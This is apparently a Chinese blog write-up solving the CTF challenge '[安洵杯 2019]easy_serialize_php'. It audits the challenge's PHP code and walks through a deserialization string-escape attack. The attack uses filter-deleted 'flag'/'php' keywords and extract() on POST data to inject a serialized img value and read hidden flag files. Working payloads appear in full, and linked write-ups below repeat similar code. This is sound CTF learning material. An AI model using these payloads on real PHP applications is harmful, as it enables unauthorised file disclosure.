[安洵杯 2019]easy_serialize_php

最新推荐文章于 2022-03-09 09:44:42 发布
最新推荐文章于 2022-03-09 09:44:42 发布
阅读量6.7k 收藏 4
点赞数 2
分类专栏: PHP反序列化 文章标签: php php反序列化 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gd_9988/article/details/105980252
版权

[安洵杯 2019]easy_serialize_php

现在对反序列化题目的思路越来越清晰了,也觉得更有趣了。
开淦
首先打开网页,点击source_code
一大串代码,给人眼花撩乱的感觉挺复杂的
简单审计了一下,还是发现了一个危险函数file_get_contents(),同时也看到了一个unserialize操作

else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!

这里又提到了在phpinfo里面可能可以得到一些提示
那么先
?f=phpinfo一探究竟

那么我们就要使用这个危险函数来读取这个php文件
继续之前的思路
$userinfo是反序列化$serialize_info的结果
跟进

$serialize_info = filter(serialize($_SESSION));

这里我们可以看到$_SESSION变量是经过filter函数处理过的。

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

filter函数也就将一些敏感字符串替换为空,但却为后文买下了伏笔
继续向下看

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);

这里就是数据传入的地方,extract变量使我们可以控制这两个参数,ok,再看最后一部分了

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

这里控制img_path我想也是不现实的,因为经过了sha1函数处理,所以我们目前可以控制的点,$_SESSION[user]和$_SESSION[function]
好的,那么接下来我们开始构造

<?php
$_SESSION["user"] = '{1}';
$_SESSION['function'] = '{2}';
$_SESSION['img'] = base64_encode('guest_img.png');
echo serialize($_SESSION);

首先我们看看正常序列化的结果:

a:3:{s:4:"user";s:3:"{1}";s:8:"function";s:3:"{2}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

可以看到{1}和{2}是我们可以控制的点

那么我们可以构造一个这样的$_SESSION[function]

";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

而之前的filter函数将php flag啥的都替换为空,那么我们就可以使$_SESSION[user]="“中字符串的长度等于”;s:8:“function”;s:41:"一共23位

$_SESSION['user']="flagflagflagflagphpflag"

综合

<?php
$_SESSION['user']="flagflagflagphpflagflag";
$_SESSION['function'] = '";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$_SESSION['img'] = base64_encode('guest_img.png');
echo serialize($_SESSION);

序列化结果为

a:3:{s:4:"user";s:23:"flagflagflagphpflagflag";s:8:"function";s:41:"";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

由于经过filter函数的处理,变为

a:3:{s:4:"user";s:23:"";s:8:"function";s:41:"";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

反序列化结果为:

array(2) 
{   
    ["user"]=>string(23)"";s:8:"function";s:41:"" 
    ["img"]=> string(20) "ZDBnM19mMWFnLnBocA==" 
}

但是经过反序列化之后,原来是三个键值,但这里只有两个键值,无法反序列化成功,所以我们需要自己再加上一个键值
故最终

$_SESSION['function']="";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"a";s:1:"a"}"

故传入参数

_SESSION[user]=flagflagflagphpflagflag&_SESSION[function] =";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"a";s:1:"a";}


查看源代码

修改payload为:

_SESSION[user]=flagflagflagphpflagflag&_SESSION[function] =";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:1:"a";s:1:"a";}
Rocl5
关注
专栏目录
[wp][安洵 2019]easy_serialize_php
小飒的博客
07-05 129
[安洵 2019]easy_serialize_php f=phpinfo 得到 d0g3_f1ag.php ZDBnM19mMWFnLnBocA==在get ?f=show_image下 随便赋值 echo一下序列化 需要吞掉这一段 我一开始构造 _SESSION[1] =flagflagflagflagflagphp&_SESSION[function]=";s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;} 发现不行,对比网上别人的payload发现必须function这
[安洵 2019]easy_serialize_php 1
最新发布
03-16
$serialized = serialize($data); echo $serialized; ?> ``` 最终输出的序列化字符串为: ``` O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:20;} ``` 其中,`O:4:"User":2:` 表示这是一个类名为 `User` 的...
easy_serialize_php-[安洵 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF]
qwsn
11-24 1748
0x01、Web 1.easy_serialize_php-[安洵 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF] 第一步:打开题目环境,进入题目链接,代码审计 <?php $function = @$_GET['f']; //GET传参:f function filter($img){ //函数:filter(),使用$img传参 $filter_arr = array('php','flag','php5','ph
------已搬运-------BUUCTF:[安洵 2019]easy_serialize_php 1(extract,字符逃逸 session反序列化的另类~.~ )
Zero_Adam的博客
02-06 640
学到的 extract的覆盖数组的操作比如能够覆盖SESSION这个全局数组! 看phpinfo时的注意点 代码审计的能力 字符串逃逸,之前还有一条路可以走,但是后来发现走不通,不过也是个好思路 劝像我一样的rookies。本地自己实验很重要,那些大佬们的payload也是不知实验了多少次才出来的。本地实验的多了,自己也就明白了 源码+我的一些注释 源码多看几遍,找找思路,灵感 <?php $function = @$_GET['f']; function filter($img){ $f
[安洵 2019]easy_serialize_php (对象逃逸)
qq_54929891的博客
03-09 3460
老规矩,分析代码,一般给你一大堆代码的题目肯定是其中某个函数有漏洞啥的 过滤函数filter,其中implode函数的作用是:将$filter_arr这个数组合并为一个字符串,并以|分割开来;所以这个正则表达式是preg_replace(/php|flag|php5|php4|f1lg/i,'',$img);filter函数作用就是过滤这五个字符串。 如果$_SESSION存在,则销毁它(unset),然后是字典的键值对的对应,extract这个函数重中之重!!!它会将你post传入的...
[2019]easy_serialize_php 1
qq_53460654的博客
09-28 1308
打开环境得到源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSIO
BUUCTF:[安洵 2019]easy_serialize_php
末初的CSDN博客
03-03 986
https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php 访问/index.php?f=highlight_file得到源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值